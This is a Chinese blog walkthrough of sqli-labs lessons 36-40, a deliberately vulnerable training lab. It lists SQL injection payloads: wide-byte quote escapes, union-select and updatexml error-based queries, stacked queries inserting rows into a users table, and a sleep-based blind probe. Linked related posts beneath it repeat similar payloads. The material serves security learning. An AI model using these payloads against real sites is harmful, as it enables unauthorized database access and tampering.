sqli-labs通关lesson36-40

已于 2023-03-25 14:36:34 修改
阅读量283 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: 网络安全 Powered by 金山文档
于 2023-03-06 19:10:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129298685
版权

1.lesson36 union select

判断注入:

为单引号注入

?id=1%df'-- +

查数据库:

?id=-1%df' union select 1,2,database()-- +

2.lesson-37 报错注入

判断注入:

为单引号注入

通过下方判断password为单引号注入

uname=z&passwd=g%df' -- +&submit=Submit

查数据库:

uname=z&passwd=g%df' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&submit=Submit

3.lesson-38 堆叠注入

判断注入:

为单引号注入

因为代码有mysqli_multi_query这个函数,造成了堆叠注入,这个函数可以执行多条sql语句

往表中插入数据

?id=1';insert into users (username,password) values('11','11');%23

1';show database;-- +不可用,没有数据出来是因为代码只处理了第一个数据

union select 也可以查出数据

?id=-1' union select 1,2,database()-- +

4.lesson-39 堆叠注入

判断注入:

整型注入

?id=1';insert into users (username,password) values('22','22');%23

也可以用union select

-1 union select 1,2,database()

5.lesson-40 堆叠注入

判断注入:

没有报错,使用时间盲注判读闭合符号

?id=1') and sleep(5)-- +

插入数据:

?id=1');insert into users (username,password) values('33','33');%23

也可以用union select

-1') union select 1,2,database()-- +
mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs(36)
weixin_30301449的博客
06-01 308
0X01发现又是‘’被过滤了 ?id=1%df%27%20and%201=2%23 错误 ?id=1%df%27%20and%201=1%23 正确 存在注入 0X01爆数据库 ?id=-1%df%27%20union%20select%201,database(),3%23 0x02组合拳打法 转载于:https://www.cnblogs.com/-zh...
buuctf的sqli-labs靶场的36关,(宽字节注入)
DMXA的博客
10-07 225
【代码】buuctf的sqli-labs靶场的36关,(宽字节注入)
sqli-labs 36-65闯关
小龙在线
10-24 400
第三十六关:mysql_real_escape_string宽字符+GET单引号 跟第三十三关基本一致。 ?id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ ?id=2&amp
sqli-Labs————less-36
Fly_鹏程万里
05-20 516
Less-36源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs/Less-36
m0_71299382的博客
11-21 165
sqli-labs第三十六关
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
SQLi LABS Less-36
热门推荐
wangyuxiang946的博客
06-28 1万+
第三十六关注入点为 单引号字符串型 , 注入方式为 报错注入 此关卡通过 代码WAF 对单引号' 进行了转义 , 我们使用%df%27% 代替单引号' 绕过WAF , 先上结果 ?id=1%df%27 and updatexml(1,concat(0x7e, (select group_concat(schema_name) from information_schema.schemata) ),3) %23 ?id=1%df%27 and updatexml(1,concat(0..
sqli-labs (less-36)
kukudeshuo的博客
03-14 290
sqli-labs (less-36) 进入36关,输入id=1 http://127.0.0.1/sql1/Less-36/?id=1' 查看源代码看看这关是否使用了GBK编码 确定使用了GBK编码,使用%df让单引号成功逃逸就可以了 http://127.0.0.1/sql1/Less-36/?id=1%df' 通过错误信息判断闭合方式为’–+,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-36/?id=-1%df' union select 1,2,
SQLi Labs Lesson36 & Lesson37
1ame的博客
08-30 608
Lesson - 36 GET - Bypass MySQL_real_escape_string 构造 ?id=0%bf%27%20union%20select%201,database(),3--+ Lesson - 37 POST - Bypass MySQL_real_escape_string
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
建筑结构\施工图\B型施工图-建筑-别墅结构施工图.dwg
06-17
建筑结构\施工图\B型施工图-建筑-别墅结构施工图.dwg
tensorflow-2.8.1-cp39-cp39-win-amd64.whl
06-17
python安装
protobuf-3.15.6-cp36-cp36m-macosx_10_9_x86_64.whl
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
pyzmq-23.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl
最新发布
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
sqli-labs通关28
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值